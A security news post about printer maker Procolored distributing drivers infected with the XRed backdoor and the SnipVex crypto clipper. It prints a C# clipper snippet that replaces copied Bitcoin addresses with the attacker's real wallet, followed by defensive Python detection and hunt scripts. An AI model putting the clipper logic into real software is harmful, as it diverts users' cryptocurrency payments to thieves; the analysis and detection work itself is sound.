Cyber Web Spider Blog – News
Printer Company Offered Malicious Drivers Infected With XRed Malware

Posted on May 17, 2025 By CWS

In a concerning supply-chain incident, printer manufacturer Procolored unknowingly distributed malware-infected software for roughly six months, ending in May 2025.

The issue came to light when YouTube creator Cameron Coward of the channel Serial Hobbyism attempted to review a $6,000 UV printer and was alerted by his antivirus software to infections on the company-provided USB drive.

What initially looked like false positives was subsequently confirmed to be genuine malware: a combination of a backdoor and a cryptocurrency-stealing file infector.

The infected software packages, available for download from Procolored's website via mega.nz links, contained malicious code affecting six printer products: F8, F13, F13 Pro, V6, V11 Pro, and VF13 Pro.

When users installed the drivers, their systems became infected with two distinct malware strains: Win32.Backdoor.XRedRAT.A and MSIL.Trojan-Stealer.CoinStealer.H (referred to as SnipVex).

The infections affected a total of 39 files across the various software packages, with 20 unique file hashes identified.

G DATA security researchers determined that the XRed backdoor component had previously been documented in February 2024, indicating this was not a new threat but an older malware strain that had found its way into Procolored's supply chain.

Analysis showed the backdoor contained exactly the same command and control URLs as the variants analyzed earlier, even though those servers had already gone offline before this incident gained attention.

The impact of these infections extended beyond data security concerns. Blockchain analysis showed that the attackers' Bitcoin address had received approximately 9.3 BTC, equivalent to roughly $100,000, likely from hijacked cryptocurrency transactions.

Although the command and control infrastructure has been inactive since February 2024, which limits what the backdoor can do, the file-infecting capability of SnipVex continues to pose a significant risk to affected systems, because it keeps spreading without any server.

Infection Mechanism of SnipVex

The SnipVex component uses a straightforward file infection technique: it operates as a classic prepending virus, writing its own body in front of the host executable.

Payload of SnipVex consists of only eight lines (Source: G DATA)

When analyzing the PrintExp.exe sample (SHA256: 531d08606455898408672d88513b8a1ac284fdf1fe011019770801b7b46d5434), researchers found that the malware had prepended itself to legitimate executable files.

The virus's infection routine is simple but effective. It first checks the target file for an infection marker, specifically the byte sequence 0x0A 0x0B 0x0C in the final three bytes, to avoid infecting the same file twice.

Infection routine of SnipVex (Source: G DATA)

It then deliberately avoids infecting files in the %TEMP% or %APPDATA% directories, as well as any file whose name begins with a dot.

// SnipVex clipboard monitoring code (C#)
// Looks for a legacy Bitcoin address pattern in the clipboard text and, on a match,
// overwrites the entire clipboard with the attacker's address
using System.Text.RegularExpressions;
using System.Windows.Forms;

string clipboardText = Clipboard.GetText();
if (Regex.IsMatch(clipboardText, "[13][a-km-zA-HJ-NP-Z1-9]{25,34}"))
{
    Clipboard.SetText("1BQZKqdp2CV3QV5nUEsqSg1ygegLmqRygj");
}
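The clipper decision from the snippet above, reproduced in Python as an added example (not the malware's or G DATA's code) so it can be probed offline, together with a simple copy-versus-paste check a defender can apply. The clipboard strings are constructed samples; the example addresses are well-known public ones and have nothing to do with this incident.

```python
"""Clipper decision logic from the SnipVex snippet, plus a defender-side check.

Added example, not code from the malware, G DATA or Procolored. Sample
clipboard strings are constructed; the regex and attacker address are the
ones quoted in the article."""
import re

# The exact, unanchored pattern from the snippet: legacy P2PKH ("1...") and
# P2SH ("3...") addresses in Base58 (no 0, O, I or l), 26-35 characters long.
CLIPPER_PATTERN = re.compile(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}")
# Attacker address quoted in the snippet above.
ATTACKER_ADDRESS = "1BQZKqdp2CV3QV5nUEsqSg1ygegLmqRygj"


def clipper_output(clipboard_text: str) -> str:
    """Clipboard contents after the clipper has inspected them.

    Two properties follow from the snippet: the search is unanchored, so any
    text that merely contains a legacy address is replaced wholesale (a payment
    memo becomes just the attacker address); and Bech32 addresses ("bc1...")
    never match, so SegWit payments pass through untouched."""
    if CLIPPER_PATTERN.search(clipboard_text):
        return ATTACKER_ADDRESS
    return clipboard_text


def paste_was_tampered(copied: str, pasted: str) -> bool:
    """Defender heuristic: the user copied text containing an address and is
    about to paste a different, bare address-shaped string. A wallet front end
    or a clipboard-watching EDR rule can alert on exactly this transition."""
    if copied == pasted:
        return False
    copied_had_address = CLIPPER_PATTERN.search(copied) is not None
    pasted_is_address = CLIPPER_PATTERN.fullmatch(pasted.strip()) is not None
    return copied_had_address and pasted_is_address


def demo() -> dict[str, str]:
    """Run constructed clipboard contents through the clipper logic."""
    samples = {
        "legacy": "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa",
        "p2sh_in_memo": "Pay 0.5 BTC to 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy, invoice 4471",
        "bech32": "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
        "plain_text": "meeting moved to 3pm",
    }
    return {name: clipper_output(text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:13s} -> {result}")
```

Running it shows the legacy address and the memo both collapse to the attacker address, while the Bech32 address and ordinary text survive; `paste_was_tampered` is the check a wallet should run before it accepts a pasted destination.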

To propagate, SnipVex monitors all logical drives for changes to files with the ".exe" extension and infects them as they appear, which turns every connected or removable drive into a carrier.

The virus establishes persistence through two values under the Windows Registry run key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, named ScdBcd and ClpBtcn, so that it is started again after every reboot.
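A small hunt script for the indicators described in this section (the trailing 0A 0B 0C marker and the %TEMP%, %APPDATA% and dot-file exclusions from the infection routine, and the ScdBcd/ClpBtcn Run values from the persistence paragraph). This is an added example, not G DATA's or Procolored's code; it assumes nothing beyond what the article states, and the sample tree it scans in demo() is constructed for illustration.

```python
"""Hunt for the SnipVex indicators described above.

Added example, not G DATA's or Procolored's code. It relies only on what the
report states: an infected host executable ends with the marker bytes
0A 0B 0C, the virus skips %TEMP%, %APPDATA% and dot-files when infecting,
and it persists through Run values named ScdBcd and ClpBtcn under HKCU.
The sample tree built in demo() is constructed for illustration.
"""
import sys
import tempfile
from pathlib import Path

INFECTION_MARKER = b"\x0a\x0b\x0c"  # final three bytes of an infected host
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAMES = ("ScdBcd", "ClpBtcn")  # persistence value names from the report


def has_infection_marker(path: Path) -> bool:
    """True if the file's last three bytes are the SnipVex superinfection marker."""
    try:
        size = path.stat().st_size
        if size < len(INFECTION_MARKER):
            return False
        with path.open("rb") as fh:
            fh.seek(size - len(INFECTION_MARKER))
            return fh.read(len(INFECTION_MARKER)) == INFECTION_MARKER
    except OSError:
        return False


def virus_would_skip(path: Path, excluded_dirs: list[Path]) -> bool:
    """Mirror the virus's own exclusions: anything under %TEMP% or %APPDATA%
    (pass those directories in) and any file whose name starts with a dot.
    A marked file in such a place was not infected there; it is more likely a
    copied infected binary or the dropped payload itself, which is worth
    knowing when you reconstruct how the infection moved."""
    if path.name.startswith("."):
        return True
    resolved = path.resolve()
    return any(d.resolve() in resolved.parents for d in excluded_dirs)


def scan_tree(root: Path) -> list[Path]:
    """Every .exe under root that carries the marker, regardless of location."""
    return sorted(p for p in root.rglob("*.exe") if p.is_file() and has_infection_marker(p))


def run_value_persistence() -> list[tuple[str, str]]:
    """On Windows, return (value name, command) for the Run values the virus uses.
    Other platforms have no registry, so the result is empty there."""
    if sys.platform != "win32":
        return []
    import winreg  # Windows-only standard-library module

    found = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        for name in RUN_VALUE_NAMES:
            try:
                value, _ = winreg.QueryValueEx(key, name)
                found.append((name, str(value)))
            except FileNotFoundError:
                continue
    return found


def demo() -> dict[str, list[str]]:
    """Build a constructed sample tree, scan it and classify the hits."""
    with tempfile.TemporaryDirectory() as td:
        root = Path(td)
        temp_dir = root / "Temp"          # stands in for %TEMP% in this demo
        (root / "Driver").mkdir()
        temp_dir.mkdir()
        host = b"MZ" + b"\x00" * 62 + b"legitimate host bytes"
        (root / "PrintExp.exe").write_bytes(host)                              # clean
        (root / "Driver" / "setup.exe").write_bytes(host + INFECTION_MARKER)   # infected in place
        (temp_dir / "installer.exe").write_bytes(host + INFECTION_MARKER)      # marked, but in %TEMP%
        (root / ".hidden.exe").write_bytes(host + INFECTION_MARKER)            # marked dot-file
        marked = scan_tree(root)
        in_place = [p for p in marked if not virus_would_skip(p, [temp_dir])]

        def rel(p: Path) -> str:
            return p.relative_to(root).as_posix()

        return {"marked": [rel(p) for p in marked],
                "infected_in_place": [rel(p) for p in in_place]}


if __name__ == "__main__":
    print(demo())
    print(run_value_persistence())
```

On a real host, call `scan_tree(Path("C:/"))` and pass the actual `%TEMP%` and `%APPDATA%` paths to `virus_would_skip`; the marker check alone is enough to find infected hosts, and `run_value_persistence()` confirms whether the virus is still set to start at logon.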

Procolored has since removed all infected software from its website and issued remediation guidance to affected customers, promising improved security measures for future software distributions.
